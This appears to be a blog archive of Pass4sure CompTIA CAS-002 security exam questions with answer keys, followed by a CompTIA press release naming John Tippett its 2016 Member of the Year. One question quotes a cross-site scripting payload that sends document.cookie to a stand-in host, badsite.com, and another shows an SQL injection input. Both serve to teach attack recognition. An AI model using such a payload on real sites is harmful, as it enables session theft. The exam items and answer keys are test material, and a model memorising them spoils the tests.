Thursday, 1 September 2016

Pass4sure CAS-002 Question Answer

A security administrator wants to deploy a dedicated storage solution which is inexpensive, can natively integrate with AD, allows files to be selectively encrypted and is suitable for a small number of users at a satellite office. Which of the following would BEST meet the requirement?

A. SAN
B. NAS
C. Virtual SAN
D. Virtual storage

Answer: B


At 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive. The outage lasts for around 10 minutes, after which everything runs properly again. The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. Which of the following is the MOST likely cause of the problem and the BEST solution? (Select TWO).


A. Add guests with more memory to increase capacity of the infrastructure.
B. A backup is running on the thin clients at 9am every morning.
C. Install more memory in the thin clients to handle the increased load while booting.
D. Booting all the lab desktops at the same time is creating excessive I/O.
E. Install 10-Gb uplinks between the hosts and the lab to increase network capacity.
F. Install faster SSD drives in the storage system used in the infrastructure.
G. The lab desktops are saturating the network while booting.
H. The lab desktops are using more memory than is available to the host systems.

Answer: DF

                    CAS-002 VCE    Exam JK0-018 VCE      CompTIA Certification Exams VCE

Wednesday, 13 July 2016

Pass4sure CAS-002 Question Answer

A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important?

A. Insecure direct object references, CSRF, Smurf
B. Privilege escalation, Application DoS, Buffer overflow
C. SQL injection, Resource exhaustion, Privilege escalation
D. CSRF, Fault injection, Memory leaks

Answer: A

Thursday, 9 June 2016

Pass4sure CAS-002 Question Answer

select id, firstname, lastname from authors
User input= firstname= Hack;man
lastname=Johnson
Which of the following types of attacks is the user attempting? 


A. XML injection
B. Command injection
C. Cross-site scripting
D. SQL injection

Answer: D

Tuesday, 10 May 2016

Pass4sure CAS-002 Question Answer

An application present on the majority of an organization’s 1,000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue? 

A. Deploy custom HIPS signatures to detect and block the attacks.
B. Validate and deploy the appropriate patch.
C. Run the application in terminal services to reduce the threat landscape.
D. Deploy custom NIPS signatures to detect and block the attacks.

Answer: B

Wednesday, 6 April 2016

Pass4sure CAS-002 Question Answer

An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure? 

A. Replicate NAS changes to the tape backups at the other datacenter.
B. Ensure each server has two HBAs connected through two routes to the NAS.
C. Establish deduplication across diverse storage paths.
D. Establish a SAN that replicates between datacenters.

Answer: D

Monday, 29 February 2016

Pass4sure CAS-002 Question Answer

A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. 
Which of the following is the BEST course of action?

A. Investigate the network traffic and block UDP port 3544 at the firewall
B. Remove the system from the network and disable IPv6 at the router
C. Locate and remove the unauthorized 6to4 relay from the network
D. Disable the switch port and block the 2001::/32 traffic at the firewall

Answer: A

A security administrator notices the following line in a server's security log: <input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "'; The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM

Answer: A

Wednesday, 17 February 2016

CompTIA Announces 2016 Member of the Year

CompTIA today announced John Tippett, vice president and general manager of Aisle8, is the association's 2016 Member of the Year. An inaugural awards ceremony in Tippett's honor will take place next month at the CompTIA Annual Member meeting, to be held March 22-24 at the Fairmont Chicago Millennium Park Hotel.

Tippett joined CompTIA in 2010, and over the last five years, has held numerous leadership roles within CompTIA's Member Communities including the Managed Services Community where he served as chair from 2014-2015, and vice chair in 2013. Tippett also served as a member of CompTIA's Communities Executive Board from 2013 to 2015, and continues to serve as a member of CompTIA's Ambassadors Group. He is a familiar face at CompTIA's Annual Member Meeting and ChannelCon, and a recognized business leader within the MSP community.

"John has been instrumental in spearheading the growth of our Managed Services Community, and providing leadership and guidance to our members as they transition to a more proactive service delivery model," said Nancy Hammervik, senior vice president, Industry Relations. "In a short time, John has helped shape our community and developed actionable content that is speeding time to market and helping members thrive. John's leadership and constant motivation to do business better is contagious and has helped MSPs, and the IT industry, better understand the benefits of managed services."

In 2011, Tippett participated as a subject matter expert in the development of CompTIA's standards around Managed Services. Last year, he also led the development of The Lifecycle of a Managed Services infographic, which is now included in CompTIA's Quick Start Guide to Managed Services. The easy-to-reference visual aid demonstrates to MSPs and IT service providers the role that marketing, sales, client on boarding, and other elements play in building a successful managed services business.

"It is an honor to be recognized by CompTIA as the association's inaugural 'Member of the Year,'" said Tippett. "I have gained so much from my involvement with CompTIA, and I am equally excited and humbled to receive this award. It has been gratifying to work with CompTIA staff and members over the years, and I am grateful for what I have gained and for the opportunity to give back to other members.  Being part of CompTIA has been a tremendously rewarding experience, and I am excited to see what the future holds."

Established in 2016, the CompTIA Member of the Year Award celebrates the contributions and commitment of a single Premier Member to the greater community. Nominations are accepted and reviewed annually. Upon selection, CompTIA awards one member for his or her commitment, passion, professionalism and leadership toward advancing the industry in the prior 12 months. To learn more about the CompTIA Member of the Year award visit https://www.comptia.org/about-us/comptia-member-of-the-year-award.